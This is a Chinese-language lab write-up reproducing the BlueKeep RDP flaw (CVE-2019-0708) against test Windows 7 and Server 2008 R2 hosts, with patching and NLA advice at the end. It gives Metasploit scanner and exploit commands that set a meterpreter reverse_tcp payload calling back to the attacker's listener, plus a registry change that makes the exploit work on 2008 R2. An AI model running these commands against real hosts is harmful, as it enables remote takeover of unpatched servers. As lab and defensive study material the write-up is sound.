CVE-2019-0708漏洞复现与修复

实验环境：
Kali:192.168.73.131
Win7sp1:192.168.73.130
Win2008R2sp1:192.168.73.136

先上波图

挖洞千万条，安全第一条，挖洞不规范，家人泪两行

0x01 漏洞原理及描述

Windows系列服务器于2019年5月15号，被爆出高危漏洞，该漏洞影响范围较广如：windows2003、windows2008、windows2008 R2、windows xp系统都会遭到攻击，该服务器漏洞利用方式是通过远程桌面端口3389，RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞，跟之前的勒索，永恒之蓝病毒差不多。CVE-2019-0708漏洞是通过检查用户的身份认证，导致可以绕过认证，不用任何的交互，直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用，会导致服务器入侵，中病毒，像WannaCry 永恒之蓝漏洞一样大规模的感染。2019年9月7日晚上凌晨1点左右，metaspolit更新了漏洞利用程序

在2019年5月，微软发布了针对远程代码执行漏洞CVE-2019-0708的补丁更新，该漏洞也称为“BlueKeep”，漏洞存在于远程桌面服务（RDS）的代码中。此漏洞是预身份验证，无需用户交互，因此具有潜在武器化蠕虫性性漏洞利用的危险。如果成功利用此漏洞，则可以使用“系统”权限执行任意代码。Microsoft安全响应中心的建议表明这个漏洞也可能会成为一种蠕虫攻击行为，类似于Wannacry和EsteemAudit等攻击行为。由于此漏洞的严重性及其对用户的潜在影响，微软采取了罕见的预警步骤，为不再受支持的Windows XP操作系统发布补丁，以保护Windows用户。

0x02 漏洞影响

该漏洞影响旧版本的Windows系统，包括：
Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP。
Windows 8和Windows 10及之后版本不受此漏洞影响。

0x03 前期准备

Tips:这次主要用msf集成的poc和exp进行漏洞利用

# 初始化msf
$ service postgresql start
$ msfdb init 
$ msfconsole

查询可利用模块

$ search cve-2019-0708

win7为例扫描一下

$ use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
$ show options
$ set RHOST ip
$ exp/run

返回内容

[+] 192.168.73.130:3389   - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.73.130:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

0x04 漏洞利用

# 加载利用模块
$ use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

# 加载监听反弹payload模块
$ set payload windows/x64/meterpreter/reverse_tcp

# 配置本机监听地址
$ set LHOST local ip

# 配置远程目标主机地址
$ set RDP_CLIENT_IP ip
$ set RHOSTS ip

# 设置target即设置目标类型，提高成功率
$ set target 6

查看配置

攻击

成功返回meterpreter
截图桌面screenshot
提权过程可参考ms17-010

win2008r2sp1为例
Tips：经测试2008r2 Enterprise为例需要更改注册表
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdp-tcp\fDisableCam]值修改为0(系统默认为1）

0x05 漏洞修复与防御

windows桌面版本可以通过杀毒工具等渠道进行升级安装补丁包。
windows server等服务器系统可以访问官方下载补丁包下载。

防御方法可以设置远程连接为“仅允许允许使用网络级别身份验证的远程桌面的计算机连接”或不允许连接到此计算机